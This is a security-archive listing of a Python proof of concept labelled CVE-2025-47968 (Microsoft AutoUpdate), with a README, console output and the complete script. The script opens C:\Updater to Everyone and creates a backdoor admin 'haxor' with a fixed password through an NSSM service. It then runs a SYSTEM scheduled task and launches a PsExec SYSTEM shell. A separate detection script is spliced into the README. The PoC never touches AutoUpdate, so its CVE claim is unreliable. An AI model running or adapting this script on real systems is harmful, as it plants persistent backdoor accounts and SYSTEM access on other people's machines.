📄 Microsoft AutoUpdate Privilege Escalation

🗓️ 04 Jul 2025 00:00:00 | Reported by nu11secur1ty | Type: packetstorm
🔗 packetstorm.news | 👁 115 Views

Simulates CVE-2025-47968 in Microsoft AutoUpdate, showing escalation via services.

Code
# Title: CVE-2025-47968-Core-Logic Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
# Author: nu11secur1ty
# Date: 07/03/2025
# Vendor: https://www.microsoft.com/en-us
# Software: https://www.microsoft.com/en-us/d/windows-11-pro/dg7gmgf0d8h4
# Reference: https://portswigger.net/web-security/access-control
    
## Description:

This Python script simulates the core logic of CVE-2025-47968 on Windows
systems. It demonstrates privilege escalation by:

- Creating a new user `haxor` with administrative privileges.
- Using NSSM (Non-Sucking Service Manager) to install and run a malicious service.
- Leveraging scheduled tasks to escalate the user to SYSTEM-level privileges.
- Launching a SYSTEM-level command shell using PsExec.

## Prerequisites

- Windows system with administrative rights.
- `nssm.exe` placed in `C:\nssm\nssm.exe`.
- `psexec.exe` placed in the same directory as the Python script.
- Python 3 installed.
    
## How It Works

1. Checks if the script is run with administrator privileges.
2. Creates directory `C:\Updater` and sets full permissions.
3. Drops a batch file to add the user `haxor` and add it to administrators.
4. Uses NSSM to install a service that runs this batch file.
5. Starts the service to create the user.
6. Uses scheduled tasks to add the user to administrators group as SYSTEM.
7. Creates a scheduled task to open a SYSTEM shell via PowerShell.
8. Runs PsExec to open an interactive SYSTEM command prompt.
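Every step of that chain leaves a trace a defender can correlate: a new service whose host is a generic launcher (event 7045), a user created and added to Administrators from the SYSTEM context (4720, 4732), a SYSTEM scheduled task that edits the Administrators group (4698), and a service payload sitting in a directory that `icacls` has opened to Everyone. The Python below is an added detection example and is not part of the original post or the author's PoC; it parses constructed `icacls` output and constructed event records (the dictionary field names and the `WORKSTATION$` subject are assumptions modelled on the console output shown further down) and reports the findings plus whether the service-install-to-new-admin sequence occurred inside a short window.

```python
import ntpath
import re

# Real Windows event IDs: 7045 = new service installed (System log); 4720 = user
# account created, 4732 = member added to a local security group, 4698 =
# scheduled task created (Security log).
SERVICE_INSTALLED, USER_CREATED, GROUP_MEMBER_ADDED, TASK_CREATED = 7045, 4720, 4732, 4698
WINDOW_SECONDS = 300                    # steps closer than this are treated as one chain
LAUNCHERS = {"nssm.exe", "cmd.exe", "powershell.exe"}   # generic hosts for a service payload
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "users", "authenticated users",
                    "nt authority\\authenticated users"}
WRITE_RIGHTS = {"F", "M", "W"}          # icacls simple rights that permit writing

# First line of an icacls entry is "<path> <ace>", continuation lines are indented ACEs.
# Assumption: paths without spaces (the textual form is ambiguous otherwise).
ENTRY_RE = re.compile(r"^(?P<path>.+?) (?P<ace>[^:]+:.*)$")
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?:\([A-Z]+\))*(?P<rights>[A-Z]+|\([A-Z,]+\))$")
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\[^"\s]+')


def parse_icacls(text):
    """Parse icacls listing text into {path: [(principal, set_of_rights)]}."""
    acl, path = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if line.startswith(" "):
            ace = line.strip()
        else:
            m = ENTRY_RE.match(line.strip())
            if not m:
                continue
            path, ace = m.group("path"), m.group("ace")
            acl[path] = []
        a = ACE_RE.match(ace)
        if a and path is not None:
            acl[path].append((a.group("who"), set(a.group("rights").strip("()").split(","))))
    return acl


def world_writable_paths(acl):
    """Paths on which a broad principal holds Full, Modify or Write."""
    return [p for p, aces in acl.items()
            if any(who.lower() in BROAD_PRINCIPALS and rights & WRITE_RIGHTS
                   for who, rights in aces)]


def _under(path, directory):
    p, d = path.lower(), directory.lower().rstrip("\\")
    return p == d or p.startswith(d + "\\")


def analyse(events, icacls_text):
    """Return (findings, chain_seen) for constructed event records plus an icacls listing."""
    writable = world_writable_paths(parse_icacls(icacls_text))
    findings, svc_ts, chain_seen = [], None, False
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == SERVICE_INSTALLED:
            if ntpath.basename(ev["image"]).lower() in LAUNCHERS:
                findings.append(f'7045 {ev["service"]}: hosted by generic launcher {ev["image"]}')
            for p in WIN_PATH_RE.findall(f'{ev["image"]} {ev.get("args", "")}'):
                if any(_under(p, d) for d in writable):
                    findings.append(f'7045 {ev["service"]}: runs {p} from a world-writable directory')
            svc_ts = ev["ts"]
        elif ev["id"] == USER_CREATED and ev["subject"].endswith("$"):
            # A machine-account subject means the account was created in SYSTEM context
            findings.append(f'4720 {ev["target"]}: created by {ev["subject"]} (SYSTEM context)')
        elif ev["id"] == GROUP_MEMBER_ADDED and ev["group"].lower() == "administrators":
            findings.append(f'4732 {ev["member"]}: added to Administrators by {ev["subject"]}')
            if svc_ts is not None and ev["ts"] - svc_ts <= WINDOW_SECONDS:
                chain_seen = True       # new admin shortly after a suspicious service install
        elif (ev["id"] == TASK_CREATED and ev["run_as"].upper() == "SYSTEM"
              and re.search(r"net\s+localgroup\s+administrators", ev["command"], re.I)):
            findings.append(f'4698 {ev["task"]}: SYSTEM task edits Administrators: {ev["command"]}')
    return findings, chain_seen


# Constructed sample data shaped after the PoC's console output; not real logs.
SAMPLE_ICACLS = """C:\\Updater Everyone:(OI)(CI)F
           BUILTIN\\Administrators:(I)(OI)(CI)F
           NT AUTHORITY\\SYSTEM:(I)(OI)(CI)F
Successfully processed 1 files; Failed processing 0 files"""
SAMPLE_EVENTS = [
    {"id": 7045, "ts": 100, "service": "FakeUpdater", "image": "C:\\nssm\\nssm.exe",
     "args": 'cmd.exe /c "C:\\Updater\\update.bat"'},
    {"id": 4720, "ts": 106, "target": "haxor", "subject": "WORKSTATION$"},
    {"id": 4732, "ts": 107, "group": "Administrators", "member": "haxor", "subject": "WORKSTATION$"},
    {"id": 4698, "ts": 112, "task": "\\EscalateToSystem", "run_as": "SYSTEM",
     "command": "net localgroup administrators haxor /add"},
]

if __name__ == "__main__":
    findings, chain = analyse(SAMPLE_EVENTS, SAMPLE_ICACLS)
    print("\n".join(findings))
    print("chain detected:", chain)
```

The launcher rule on its own is noisy (plenty of legitimate services are wrapped by NSSM), so the example only sets `chain_seen` when the Administrators change follows the service install inside `WINDOW_SECONDS`; the world-writable check is the part worth running proactively, since an `Everyone:(OI)(CI)F` grant on a directory a service executes from is the misconfiguration this PoC depends on.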
    
## Usage

Run the script as administrator:

```powershell
python simulate_cve_2025_47968.py
```
Output should be:
```
[+] Created folder: C:\Updater
[+] Running: icacls "C:\Updater" /grant Everyone:(OI)(CI)F /T
processed file: C:\Updater
processed file: C:\Updater\update.bat
Successfully processed 2 files; Failed processing 0 files
[+] Dropped malicious batch file at: C:\Updater\update.bat
[+] Running: "C:\nssm\nssm.exe" stop FakeUpdater
FakeUpdater: STOP: The operation completed successfully.
[+] Running: "C:\nssm\nssm.exe" remove FakeUpdater confirm
Service "FakeUpdater" removed successfully!
[+] Running: "C:\nssm\nssm.exe" install FakeUpdater cmd.exe /c "C:\Updater\update.bat"
Service "FakeUpdater" installed successfully!
[+] Running: sc stop FakeUpdater
[SC] ControlService FAILED 1062:

The service has not been started.

[*] Service not running or already stopped, continuing...
[+] Running: sc start FakeUpdater

SERVICE_NAME: FakeUpdater
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1436
        FLAGS              :
[*] Waiting 5 seconds for the batch to finish executing...
[+] Success! User 'haxor' was created and added to administrators.
[*] Attempting to escalate user to SYSTEM privileges...
[+] Running: schtasks /Create /TN EscalateToSystem /TR "net localgroup administrators haxor /add" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM
WARNING: Task may not run because /ST is earlier than current time.
SUCCESS: The scheduled task "EscalateToSystem" has successfully been created.
[+] Running: schtasks /Run /TN EscalateToSystem
SUCCESS: Attempted to run the scheduled task "EscalateToSystem".
[+] Running: schtasks /Delete /TN EscalateToSystem /F
SUCCESS: The scheduled task "EscalateToSystem" was successfully deleted.
[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.
[*] Attempting to open SYSTEM shell with psexec...
[+] Running: "C:\Users\pwnedpc\Desktop\CVE-2025-47968\psexec.exe" -s -i cmd.exe

PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
```
## Important Notes

- The script requires `nssm.exe` and `psexec.exe` in specified locations.
- The SYSTEM shell opening may not always show a visible window due to system policies.
- Use responsibly and only on systems you have permission to test.

## Disclaimer

This code is for educational purposes only. Unauthorized use may violate
laws and policies.
    
# Reproduce:
- Video: [href](https://www.youtube.com/watch?v=h64Rs45yuN4)

- GitHub: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47968)

# Donate, if you are not ashamed!
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)

# Time spent:
03:15:00
    
    
Proof of Concept:

```python
#!/usr/bin/python
# Python PoC – CVE-2025-47968 Core Logic (Windows Simulation)
# nu11secur1ty 2025
import os
import subprocess
import ctypes
import sys
import time

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def run(cmd):
    print(f"[+] Running: {cmd}")
    subprocess.run(cmd, shell=True, check=True)

def check_user_exists(username):
    try:
        result = subprocess.run(f'net user {username}', shell=True, capture_output=True, text=True)
        return "The user name could not be found" not in result.stdout
    except:
        return False

def check_user_in_admins(username):
    try:
        result = subprocess.run('net localgroup administrators', shell=True, capture_output=True, text=True)
        return username.lower() in result.stdout.lower()
    except:
        return False

def escalate_to_system(username):
    task_name = "EscalateToSystem"
    cmd = f'net localgroup administrators {username} /add'

    create_task_cmd = (
        f'schtasks /Create /TN {task_name} /TR "{cmd}" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM'
    )
    run(create_task_cmd)
    run(f'schtasks /Run /TN {task_name}')
    run(f'schtasks /Delete /TN {task_name} /F')

def open_system_shell_with_psexec():
    # psexec.exe is in the same directory as this script
    script_dir = os.path.dirname(os.path.abspath(__file__))
    psexec_path = os.path.join(script_dir, "psexec.exe")

    if not os.path.isfile(psexec_path):
        print(f"[!] ERROR: psexec.exe not found at {psexec_path}. Download from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec")
        return

    cmd = f'"{psexec_path}" -s -i cmd.exe'
    run(cmd)

def main():
    if not is_admin():
        print("[!] Please run this script as Administrator.")
        sys.exit(1)

    nssm_path = r"C:\nssm\nssm.exe"
    if not os.path.isfile(nssm_path):
        print(f"[!] ERROR: nssm.exe not found at {nssm_path}")
        print("Download nssm from https://nssm.cc/download and place nssm.exe at this path.")
        sys.exit(1)

    vuln_path = r"C:\Updater"
    os.makedirs(vuln_path, exist_ok=True)
    print(f"[+] Created folder: {vuln_path}")

    run(f'icacls "{vuln_path}" /grant Everyone:(OI)(CI)F /T')

    batch_path = os.path.join(vuln_path, "update.bat")
    with open(batch_path, "w") as f:
        f.write("@echo off\n")
        f.write("net user haxor Passw0rd123 /add\n")
        f.write("net localgroup administrators haxor /add\n")
    print(f"[+] Dropped malicious batch file at: {batch_path}")

    service_name = "FakeUpdater"
    username = "haxor"

    try:
        run(f'"{nssm_path}" stop {service_name}')
    except subprocess.CalledProcessError:
        print("[*] Service not running or cannot stop (may not exist), continuing...")

    try:
        run(f'"{nssm_path}" remove {service_name} confirm')
    except subprocess.CalledProcessError:
        print("[*] Service may not exist yet, continuing...")

    run(f'"{nssm_path}" install {service_name} cmd.exe /c "{batch_path}"')

    try:
        run(f'sc stop {service_name}')
    except subprocess.CalledProcessError:
        print("[*] Service not running or already stopped, continuing...")

    run(f'sc start {service_name}')

    print("[*] Waiting 5 seconds for the batch to finish executing...")
    time.sleep(5)

    user_exists = check_user_exists(username)
    user_admin = check_user_in_admins(username)

    if user_exists and user_admin:
        print(f"[+] Success! User '{username}' was created and added to administrators.")
        print("[*] Attempting to escalate user to SYSTEM privileges...")
        escalate_to_system(username)
        print("[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.")
        print("[*] Attempting to open SYSTEM shell with psexec...")
        open_system_shell_with_psexec()
    elif user_exists:
        print(f"[!] User '{username}' was created but is NOT in administrators group.")
    else:
        print(f"[!] User '{username}' was NOT created. Something went wrong.")

if __name__ == "__main__":
    main()
```


04 Jul 2025 00:00 (current)
Risk: 6.6 (Medium)
Vulners AI Score: 6.6
CVSS 3.1: 7.8
EPSS: 0.01068
SSVC
Views: 115